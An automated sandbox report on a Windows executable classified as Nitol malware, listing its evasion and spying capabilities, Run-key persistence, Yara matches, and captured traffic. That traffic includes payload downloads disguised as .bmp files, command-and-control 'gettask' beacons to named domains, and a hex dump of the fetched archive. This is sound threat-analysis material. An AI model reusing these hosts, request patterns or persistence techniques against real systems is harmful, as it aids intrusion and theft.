Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pXm5oVO3Go.exe

Overview

General Information

Sample name:pXm5oVO3Go.exe
renamed because original name is a hash value
Original sample name:d863d9572524236e97528275899b73ffe7f182b4824bd7efc12a2e8ae3e8955e.exe
Analysis ID:1499614
MD5:64a2f030c7c91762485ee16bc8a12e4f
SHA1:6193a1b655e641719f0b54edcdfce8fa326dc934
SHA256:d863d9572524236e97528275899b73ffe7f182b4824bd7efc12a2e8ae3e8955e
Tags:ad87h92j-comexe
Infos:

Detection

Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionalty to change the wallpaper
Drops password protected ZIP file
Found API chain indicative of debugger detection
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to access browser extension known for cryptocurrency wallets
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
AV process strings found (often used to terminate AV products)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • pXm5oVO3Go.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\pXm5oVO3Go.exe" MD5: 64A2F030C7C91762485EE16BC8A12E4F)
    • DAPIjX8.exe (PID: 5296 cmdline: "C:\Program Files (x86)\6fjdie\DAPIjX8.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • OpenWith.exe (PID: 7576 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • DAPIjX8.exe (PID: 1984 cmdline: "C:\Program Files (x86)\6fjdie\DAPIjX8.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • DAPIjX8.exe (PID: 2772 cmdline: "C:\Program Files (x86)\6fjdie\DAPIjX8.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.3247531468.0000000010064000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
    00000009.00000002.3246471111.00000000031D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
        Process Memory Space: DAPIjX8.exe PID: 5296JoeSecurity_NitolYara detected NitolJoe Security
          SourceRuleDescriptionAuthorStrings
          9.2.DAPIjX8.exe.32fec24.2.unpackJoeSecurity_NitolYara detected NitolJoe Security
            9.2.DAPIjX8.exe.32fec24.2.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDPDetects executables embedding registry key / value combination manipulating RDP / Terminal ServicesditekSHen
            • 0x75ff8:$r1: SOFTWARE\Policies\Microsoft\Windows\Installer
            • 0x75fe4:$k1: EnableAdminTSRemote
            • 0x75d74:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x75ed0:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x75f08:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x75f50:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x760c8:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x760a0:$k2: TSEnabled
            • 0x76044:$r3: SYSTEM\CurrentControlSet\Services\TermDD
            • 0x76070:$r4: SYSTEM\CurrentControlSet\Services\TermService
            • 0x75d11:$k3: Start
            • 0x75d1d:$k3: Start
            • 0x75d2b:$k3: Start
            • 0x75d47:$k3: Start
            • 0x7603c:$k3: Start
            • 0x7626f:$k3: start
            • 0x75d74:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x75ed0:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x75f08:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x75f50:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x760c8:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            9.2.DAPIjX8.exe.31d9c24.1.unpackJoeSecurity_NitolYara detected NitolJoe Security
              9.2.DAPIjX8.exe.31d9c24.1.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDPDetects executables embedding registry key / value combination manipulating RDP / Terminal ServicesditekSHen
              • 0x75ff8:$r1: SOFTWARE\Policies\Microsoft\Windows\Installer
              • 0x75fe4:$k1: EnableAdminTSRemote
              • 0x75d74:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75ed0:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75f08:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75f50:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x760c8:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x760a0:$k2: TSEnabled
              • 0x76044:$r3: SYSTEM\CurrentControlSet\Services\TermDD
              • 0x76070:$r4: SYSTEM\CurrentControlSet\Services\TermService
              • 0x75d11:$k3: Start
              • 0x75d1d:$k3: Start
              • 0x75d2b:$k3: Start
              • 0x75d47:$k3: Start
              • 0x7603c:$k3: Start
              • 0x7626f:$k3: start
              • 0x75d74:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75ed0:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75f08:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75f50:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x760c8:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              9.2.DAPIjX8.exe.31d9c24.1.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
                Click to see the 3 entries

                System Summary

                barindex
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\6fjdie\DAPIjX8.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\pXm5oVO3Go.exe, ProcessId: 7440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS
                Timestamp:2024-08-27T09:49:34.405364+0200
                SID:2803304
                Severity:3
                Source Port:49714
                Destination Port:80
                Protocol:TCP
                Classtype:Unknown Traffic

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Program Files (x86)\6fjdie\t4d.tmpAvira: detection malicious, Label: DR/FakePic.Gen
                Source: C:\Program Files (x86)\6fjdie\t5d.tmpAvira: detection malicious, Label: DR/FakePic.Gen
                Source: pXm5oVO3Go.exeReversingLabs: Detection: 15%
                Source: pXm5oVO3Go.exeVirustotal: Detection: 17%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: pXm5oVO3Go.exe, 00000000.00000000.1390707915.0000000000684000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4dee8bef-2
                Source: pXm5oVO3Go.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.17.45:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49725 version: TLS 1.2
                Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
                Source: Binary string: \NewJumpLogin\ReleaseSW300exe\JumpLogin.pdb source: pXm5oVO3Go.exe
                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332A374 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,_strstr,_strstr,CreateFileA,CreatePipe,CreateProcessA,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,CreatePipe,CreateProcessA,ReadFile,ReadFile,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,FindNextFileA,std::ios_base::_Ios_base_dtor,9_2_0332A374
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033263C4 FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,CreateFileA,GetFileSize,CreateFileA,GetFileSize,SetFilePointer,ReadFile,LocalAlloc,LocalFree,CloseHandle,Sleep,9_2_033263C4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03321134 lstrcpy,FindFirstFileA,lstrcpy,_strstr,LocalAlloc,LocalReAlloc,LocalSize,Sleep,LocalFree,FindNextFileA,FindClose,9_2_03321134
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332A194 lstrcpy,CreateDirectoryA,FindFirstFileA,lstrcpy,lstrcpy,CreateDirectoryA,CopyFileA,FindNextFileA,9_2_0332A194
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033210BD lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,9_2_033210BD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033210DA lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,9_2_033210DA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03322754 FindFirstFileA,FindClose,CreateFileA,Sleep,CreateFileA,CloseHandle,GetLastError,wsprintfA,9_2_03322754
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033224F4 lstrlen,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,9_2_033224F4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033314C4 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,9_2_033314C4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03353AFC FindFirstFileExW,9_2_03353AFC
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03321AD4 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,9_2_03321AD4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03321E14 FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,9_2_03321E14
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03320EB3 FindFirstFileA,FindClose,FindClose,9_2_03320EB3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03321CE4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_03321CE4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100230CD lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,9_2_100230CD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10023110 lstrcpy,FindFirstFileA,lstrcpy,_strstr,LocalAlloc,LocalReAlloc,LocalSize,Sleep,LocalFree,FindNextFileA,FindClose,9_2_10023110
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1002C170 lstrcpy,CreateDirectoryA,FindFirstFileA,lstrcpy,lstrcpy,CreateDirectoryA,CopyFileA,FindNextFileA,9_2_1002C170
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1002C350 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,_strstr,_strstr,CreateFileA,CreatePipe,CreateProcessA,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,CreatePipe,CreateProcessA,ReadFile,ReadFile,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,FindNextFileA,std::ios_base::_Ios_base_dtor,9_2_1002C350
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100283A0 FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,CreateFileA,GetFileSize,CreateFileA,GetFileSize,SetFilePointer,ReadFile,LocalAlloc,LocalFree,CloseHandle,Sleep,9_2_100283A0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100334A0 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,9_2_100334A0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100244D0 lstrlen,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,9_2_100244D0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10024730 FindFirstFileA,FindClose,CreateFileA,Sleep,CreateFileA,CloseHandle,GetLastError,wsprintfA,9_2_10024730
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10023AB0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,9_2_10023AB0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10055AD8 FindFirstFileExW,9_2_10055AD8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10023CC0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_10023CC0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10023DF0 FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,9_2_10023DF0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03325404 GetLogicalDriveStringsA,QueryDosDeviceA,lstrlen,lstrcpy,lstrcpy,lstrcat,9_2_03325404
                Source: global trafficHTTP traffic detected: GET /4/long.bmp HTTP/1.1Host: web.ad87h92j.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /4/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficHTTP traffic detected: GET /4/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficHTTP traffic detected: GET /4/t.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49714 -> 188.114.96.3:80
                Source: global trafficHTTP traffic detected: POST /api.php/common/getdomain HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36Content-Length: 18Host: cacer.goldenh0ur.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/receivejson HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36Content-Length: 482Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: a6i4oct4j4i9kob52n0pco2vfmContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: a6i4oct4j4i9kob52n0pco2vfmContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: a6i4oct4j4i9kob52n0pco2vfmContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: a6i4oct4j4i9kob52n0pco2vfmContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: a6i4oct4j4i9kob52n0pco2vfmContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: a6i4oct4j4i9kob52n0pco2vfmContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: a6i4oct4j4i9kob52n0pco2vfmContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: a6i4oct4j4i9kob52n0pco2vfmContent-Length: 38Host: mvc.withoutyou5.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00420710 ShellExecuteA,CreateThread,VirtualAlloc,VirtualAlloc,InternetOpenA,InternetOpenUrlA,InternetReadFile,CreateThread,0_2_00420710
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 27 Aug 2024 07:49:35 GMTContent-Type: image/bmpContent-Length: 6443425Connection: keep-aliveLast-Modified: Thu, 08 Aug 2024 15:32:21 GMTETag: "607df428a8e9da1:0"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 431Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ag4unlxgbi4UOJjInOq9jj0IknIEUW%2BWZAEJfwZ4z8eF5GkjiYppNG8O8BcnUQCzgkFdFjlKIMYBHDMnWWOunyST57yvGfdOTtozTl92UzkA7TLPNFZvD2bnMsKALH4nprDk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b9a77404ae242e8-EWRalt-svc: h3=":443"; ma=86400Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c 96 53 a8 93 1a 43 8a 40 72 c9 cd 4d f3 75 0b d3 e0 d6 60 25 ae d3 66 4a 4b 5d b6 5e 17 3b 24 29 1b a7 07 28 1d 48 ce 8a 24 dd e5 0f 57 31 3b 63 bc e1 b9 39 3b 66 4c 46 9f 14 f3 c4 02 68 95 c3 21 3d 7c d0 7a 12 01 3c 08 32 de 1b 41 20 0a ef 8d 8e 3c cb 3d 54 8e 28 0e 74 2d a5 bb e4 c7 6a f7 4b 3c 19 7a 3e b3 55 75 93 98 a4 85 fc 3e 61 cb 06 22 80 2d 2c 37 b8 2a 5c b0 51 a6 6b 96 fb ee 27 23 f4 d0 04 a5 0c 50 95 84 0f 9b 47 8f 5b 48 3b 2a bb f4 f8 7d 94 68 ed 84 fa fd 02 9b 9e ae f0 7d 19 69 b4 c0 78 83 f0 ef 95 a1 21 73 56 4e d7 8b 38 9a ed e1 e8 8f 47 a6 26 5f 23 ea 1f c9 5d 4a c2 09 00 e3 5f 67 5d 15 a9 47 b3 f4 9d ca 98 2c 66 Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G,f
                Source: global trafficHTTP traffic detected: GET /4/long.bmp HTTP/1.1Host: web.ad87h92j.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /4/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficHTTP traffic detected: GET /4/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficHTTP traffic detected: GET /4/t.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficDNS traffic detected: DNS query: web.ad87h92j.com
                Source: global trafficDNS traffic detected: DNS query: cacer.goldenh0ur.com
                Source: global trafficDNS traffic detected: DNS query: mvc.withoutyou5.com
                Source: unknownHTTP traffic detected: POST /api.php/common/getdomain HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36Content-Length: 18Host: cacer.goldenh0ur.com
                Source: pXm5oVO3Go.exeString found in binary or memory: http://api.jumpw.com/Announcement.html?gameid=
                Source: pXm5oVO3Go.exeString found in binary or memory: http://api.jumpw.com/Announcement.html?gameid=&channel=Receive
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
